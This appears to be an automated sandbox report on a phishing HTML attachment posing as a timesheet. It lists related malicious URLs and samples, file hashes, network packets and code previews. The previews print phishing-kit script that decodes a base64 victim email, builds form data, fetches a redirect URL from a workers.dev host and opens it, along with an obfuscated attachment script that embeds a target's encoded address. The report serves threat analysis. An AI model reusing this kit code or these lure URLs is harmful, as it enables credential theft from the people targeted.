                                                            https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                            • 151.101.130.137
                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                            • 151.101.194.137
                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                            • 151.101.2.137
                                                            natrium100gram.siteACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 194.163.42.36
                                                            tiny-hat-eab8.pagenew.workers.devACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 172.67.181.35

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            FASTLYUShttps://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                            • 151.101.2.137
                                                            https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                            • 199.232.168.159
                                                            https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                            • 199.232.196.193
                                                            https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                            • 185.199.108.133
                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                            • 185.199.109.133
                                                            Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                            • 151.101.2.137
                                                            Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 151.101.194.137
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 167.82.159.226
                                                            setup.msiGet hashmaliciousAteraAgentBrowse
                                                            • 199.232.210.172
                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                            • 185.199.108.133
                                                            NEXINTO-DEMemo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                            • 194.163.167.35
                                                            Client.exeGet hashmaliciousNjratBrowse
                                                            • 194.163.139.18
                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 212.221.170.188
                                                            Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                            • 194.195.220.41
                                                            teste.m68k.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                            • 195.179.60.20
                                                            File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                            • 212.229.88.28
                                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                            • 212.228.4.135
                                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                            • 194.163.209.67
                                                            W3UokmKK3o.msiGet hashmaliciousUnknownBrowse
                                                            • 195.179.237.110
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 194.195.220.41
                                                            CLOUDFLARENETUShttps://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                            • 104.17.25.14
                                                            https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                            • 104.17.25.14
                                                            https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                            • 104.17.24.14
                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                            • 172.67.177.88
                                                            mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                            • 188.114.97.6
                                                            Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                            • 172.67.180.133
                                                            Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                            • 172.67.180.133
                                                            Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                            • 172.67.134.110
                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                            • 104.21.67.152

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            Chrome Cache Entry: 82

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:downloaded
                                                            Size (bytes):74
                                                            Entropy (8bit):4.367312685743807
                                                            Encrypted:false
                                                            SSDEEP:3:YWR4buWsItRRV4KVnJarAWL2HAQz:YWybuORH6AWKgQz
                                                            MD5:E65347F2769D459683BFD2B3CE54038A
                                                            SHA1:93461EB5FE7F0E4263B119812FE0953F310AC2F1
                                                            SHA-256:30D5DBD145F1ADB6D7AC57F800C818CD53AFE2BBC665905DD4E06C16317BD753
                                                            SHA-512:294895C9BEB616D4F3B24E80918ED006534FFA79548CEBB5AC23426DAF318CCB6ACCC6A9754B555677321AE93E3D3712A6059C79ECE2C31367F5885AFBAD4924
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://tiny-hat-eab8.pagenew.workers.dev/
                                                            Preview:{"status":"success","message":"https://proposal-5ye.pages.dev/#?service="}

                                                            Chrome Cache Entry: 83

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:dropped
                                                            Size (bytes):87533
                                                            Entropy (8bit):5.262536918435756
                                                            Encrypted:false
                                                            SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                            MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                            SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                            SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                            SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

                                                            Chrome Cache Entry: 84

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (709)
                                                            Category:downloaded
                                                            Size (bytes):3530
                                                            Entropy (8bit):5.183989097603964
                                                            Encrypted:false
                                                            SSDEEP:48:x9313e2Z+59Uhl679Smbbc7mdOV3ny2WWAIhBJqmQAY18SFvLv:/yR9Sm8Y03JoICAYL1D
                                                            MD5:D22721B5C0396AFAB367F24463AC6542
                                                            SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                                            SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                                            SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://proposal-5ye.pages.dev/
                                                            Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}

                                                            Chrome Cache Entry: 85

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):1996
                                                            Entropy (8bit):3.766841562840628
                                                            Encrypted:false
                                                            SSDEEP:24:qmcnnVh6H563NLeWVipUBec+Zd3e9cMZjdzY0Ne9cMZjd8a6KM:+nViO3VipzRZd3e9TpNe9TYa6X
                                                            MD5:85E2CD0257A5EEBDB72981163B60E641
                                                            SHA1:F6A02A3127BFDCDD17BA3496B97DE3A89F715A5C
                                                            SHA-256:2A268A628720851D06981F71BBECAB7FE7521A336E26F015EEA61600E531A1DD
                                                            SHA-512:45B4EF064141730CD963311BB64BAE8ABD7263426103D84D43F7B51F85248B2D820D394CBE8558EA350CB26E3874CD78C9A8EEB5663A487A4AB646FF7FA34D52
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..const urlx = 'https://tiny-hat-eab8.pagenew.workers.dev';.. // Function to perform GET request. async function fetchData() {. try {. . const response = await fetch(urlx);.. if (!response.ok) {. throw new Error('Network response was not ok');. }.. . const data = await response.json();. . const message = data.message;.. return message ;.. . let messageUrl = message;.. } catch (error) {. // Handle errors. console.error('There was a problem with the fetch operation:', error);. }. }... async function run() {. console.log("readya!");. let key = "";. let jk = "";. const originalConsoleLog = console.log;. console.log = function(message) {. window.open(message,"_self").

                                                            Chrome Cache Entry: 86

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (709)
                                                            Category:downloaded
                                                            Size (bytes):3530
                                                            Entropy (8bit):5.183989097603964
                                                            Encrypted:false
                                                            SSDEEP:48:x9313e2Z+59Uhl679Smbbc7mdOV3ny2WWAIhBJqmQAY18SFvLv:/yR9Sm8Y03JoICAYL1D
                                                            MD5:D22721B5C0396AFAB367F24463AC6542
                                                            SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                                            SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                                            SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                                            Malicious:false
                                                            URL:https://proposal-5ye.pages.dev/favicon.ico
                                                            Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}

                                                            Chrome Cache Entry: 87

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:downloaded
                                                            Size (bytes):87533
                                                            Entropy (8bit):5.262536918435756
                                                            Encrypted:false
                                                            SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                            MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                            SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                            SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                            SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                            Malicious:false
                                                            URL:https://code.jquery.com/jquery-3.7.1.min.js
                                                            Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

                                                            Chrome Cache Entry: 88

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):74
                                                            Entropy (8bit):4.367312685743807
                                                            Encrypted:false
                                                            SSDEEP:3:YWR4buWsItRRV4KVnJarAWL2HAQz:YWybuORH6AWKgQz
                                                            MD5:E65347F2769D459683BFD2B3CE54038A
                                                            SHA1:93461EB5FE7F0E4263B119812FE0953F310AC2F1
                                                            SHA-256:30D5DBD145F1ADB6D7AC57F800C818CD53AFE2BBC665905DD4E06C16317BD753
                                                            SHA-512:294895C9BEB616D4F3B24E80918ED006534FFA79548CEBB5AC23426DAF318CCB6ACCC6A9754B555677321AE93E3D3712A6059C79ECE2C31367F5885AFBAD4924
                                                            Malicious:false
                                                            Preview:{"status":"success","message":"https://proposal-5ye.pages.dev/#?service="}

                                                            Chrome Cache Entry: 89

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (709)
                                                            Category:dropped
                                                            Size (bytes):3530
                                                            Entropy (8bit):5.183989097603964
                                                            Encrypted:false
                                                            SSDEEP:48:x9313e2Z+59Uhl679Smbbc7mdOV3ny2WWAIhBJqmQAY18SFvLv:/yR9Sm8Y03JoICAYL1D
                                                            MD5:D22721B5C0396AFAB367F24463AC6542
                                                            SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                                            SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                                            SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                                            Malicious:false
                                                            Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}

                                                            Chrome Cache Entry: 90

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):1996
                                                            Entropy (8bit):3.766841562840628
                                                            Encrypted:false
                                                            SSDEEP:24:qmcnnVh6H563NLeWVipUBec+Zd3e9cMZjdzY0Ne9cMZjd8a6KM:+nViO3VipzRZd3e9TpNe9TYa6X
                                                            MD5:85E2CD0257A5EEBDB72981163B60E641
                                                            SHA1:F6A02A3127BFDCDD17BA3496B97DE3A89F715A5C
                                                            SHA-256:2A268A628720851D06981F71BBECAB7FE7521A336E26F015EEA61600E531A1DD
                                                            SHA-512:45B4EF064141730CD963311BB64BAE8ABD7263426103D84D43F7B51F85248B2D820D394CBE8558EA350CB26E3874CD78C9A8EEB5663A487A4AB646FF7FA34D52
                                                            Malicious:false
                                                            URL:https://cdn.jsdelivr.net/npm/rudije@6.7.7/manislife.js
                                                            Preview:..const urlx = 'https://tiny-hat-eab8.pagenew.workers.dev';.. // Function to perform GET request. async function fetchData() {. try {. . const response = await fetch(urlx);.. if (!response.ok) {. throw new Error('Network response was not ok');. }.. . const data = await response.json();. . const message = data.message;.. return message ;.. . let messageUrl = message;.. } catch (error) {. // Handle errors. console.error('There was a problem with the fetch operation:', error);. }. }... async function run() {. console.log("readya!");. let key = "";. let jk = "";. const originalConsoleLog = console.log;. console.log = function(message) {. window.open(message,"_self").

                                                            Static File Info

                                                            General

                                                            File type:HTML document, ASCII text, with very long lines (723), with CRLF line terminators
                                                            Entropy (8bit):4.874638616028856
                                                            TrID:
                                                              File name:Timesheet ACH-Tbconsulting.November 16, 2024.html
                                                              File size:1'098 bytes
                                                              MD5:fdc286ce98189404a993230167e65fbb
                                                              SHA1:1bca6d04f245b9416afc3ec1848ed5ff7b9f5d84
                                                              SHA256:be9ffc5395a651eee7b4a08fd63ba750402845ac20a9b75deacc8a298358608e
                                                              SHA512:5176822ebc530b95118bc470a1647051a4f5992f701c28bffbfd68bffc2a6acef32d521126922a0b8371edf6ba3133cb350977416dacd0c25b647143241413ee
                                                              SSDEEP:24:L642e3KEY4ZoTKo3qNGCufkCsCXriEYUZHGJuwbQ1SMq:L7bN5mkbgq
                                                              TLSH:D0115EC4D3A9D21B5BAC4A43EE0899CC90B6812B10C17307B798F58C1BF9355CEAC498
                                                              File Content Preview: .. .. <script accesskey="r1" part="2" adidas="bWtudWRzZW5AdGJjb25zdWx0aW5nLmNvbQ==" nike-Strykerr="yike" aria-activedescendant="PP">.... let stringaway = "MEMBERSHIPhttps://www.zoom.com/en/about/,\x76\x61\x72\x20\x6b\x20\x3d\x20\x64\x6f\x63\x75\x6d\x6

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 17:16:50.501362085 CET49671443192.168.2.7204.79.197.203
                                                              Dec 19, 2024 17:16:52.907566071 CET49671443192.168.2.7204.79.197.203
                                                              Dec 19, 2024 17:16:54.141933918 CET49674443192.168.2.7104.98.116.138
                                                              Dec 19, 2024 17:16:54.142198086 CET49675443192.168.2.7104.98.116.138
                                                              Dec 19, 2024 17:16:54.266921997 CET49672443192.168.2.7104.98.116.138
                                                              Dec 19, 2024 17:16:57.260478973 CET49677443192.168.2.720.50.201.200
                                                              Dec 19, 2024 17:16:57.782572985 CET49677443192.168.2.720.50.201.200
                                                              Dec 19, 2024 17:16:57.798343897 CET49671443192.168.2.7204.79.197.203
                                                              Dec 19, 2024 17:16:58.579438925 CET49677443192.168.2.720.50.201.200
                                                              Dec 19, 2024 17:17:00.079687119 CET49677443192.168.2.720.50.201.200
                                                              Dec 19, 2024 17:17:02.079216957 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:02.079253912 CET44349709104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:02.079328060 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:02.080070972 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:02.080091953 CET44349709104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.079293966 CET49677443192.168.2.720.50.201.200
                                                              Dec 19, 2024 17:17:03.311680079 CET44349709104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.311966896 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.311988115 CET44349709104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.313533068 CET44349709104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.313591003 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315234900 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315234900 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315316916 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315339088 CET44349709104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.315459967 CET49709443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315664053 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315696955 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.315754890 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315972090 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:03.315979958 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:03.751204967 CET49674443192.168.2.7104.98.116.138
                                                              Dec 19, 2024 17:17:03.751235008 CET49675443192.168.2.7104.98.116.138
                                                              Dec 19, 2024 17:17:03.876200914 CET49672443192.168.2.7104.98.116.138
                                                              Dec 19, 2024 17:17:04.283277988 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:04.283368111 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:04.283457041 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:04.283675909 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:04.283699036 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:04.551574945 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:04.551799059 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:04.551815987 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:04.553447008 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:04.553575039 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:04.554490089 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:04.554574966 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:04.554737091 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:04.554743052 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:04.594738960 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:05.990853071 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:05.991202116 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:05.991235018 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:05.992115021 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:05.992194891 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:05.995896101 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:05.995964050 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:06.050143003 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:06.050167084 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:06.083858013 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:06.084005117 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:06.085665941 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:06.086011887 CET49711443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:06.086025953 CET44349711104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:06.094598055 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:06.247340918 CET49715443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:06.247378111 CET44349715104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:06.247525930 CET49715443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:06.247786999 CET49715443192.168.2.7104.21.51.134
                                                              Dec 19, 2024 17:17:06.247802973 CET44349715104.21.51.134192.168.2.7
                                                              Dec 19, 2024 17:17:06.260305882 CET49716443192.168.2.7172.66.47.118
                                                              Dec 19, 2024 17:17:06.260308981 CET49717443192.168.2.7172.66.47.118
                                                              Dec 19, 2024 17:17:06.260334969 CET44349716172.66.47.118192.168.2.7
                                                              Dec 19, 2024 17:17:06.260358095 CET44349717172.66.47.118192.168.2.7
                                                              Dec 19, 2024 17:17:06.260512114 CET49717443192.168.2.7172.66.47.118
                                                              Dec 19, 2024 17:17:06.260513067 CET49716443192.168.2.7172.66.47.118
